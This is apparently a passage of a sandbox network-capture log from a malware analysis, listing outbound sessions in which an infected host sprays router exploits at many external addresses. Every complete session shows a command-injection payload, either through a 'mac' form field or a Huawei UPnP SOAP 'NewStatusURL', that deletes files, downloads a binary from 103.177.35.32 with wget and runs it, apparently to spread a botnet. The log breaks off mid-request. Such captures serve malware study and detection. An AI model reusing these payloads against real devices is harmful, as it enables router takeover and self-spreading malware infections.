                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        583192.168.2.233573898.221.195.1118080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.366080999 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        584192.168.2.234072450.220.67.2058080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.366527081 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        585192.168.2.2343040194.9.64.398080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.366640091 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        586192.168.2.2358032157.16.6.537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.371891022 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        587192.168.2.2360702197.127.165.16137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.371941090 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        588192.168.2.233318641.144.90.14337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.371968985 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        589192.168.2.2338134100.190.18.24137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.371974945 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        590192.168.2.2358802197.101.32.14637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.371974945 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        591192.168.2.233494841.130.85.15937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.372034073 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        592192.168.2.234681441.164.222.13737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.372035027 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        593192.168.2.234383641.165.122.3237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.453481913 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        594192.168.2.2349030149.214.50.3837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.453496933 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 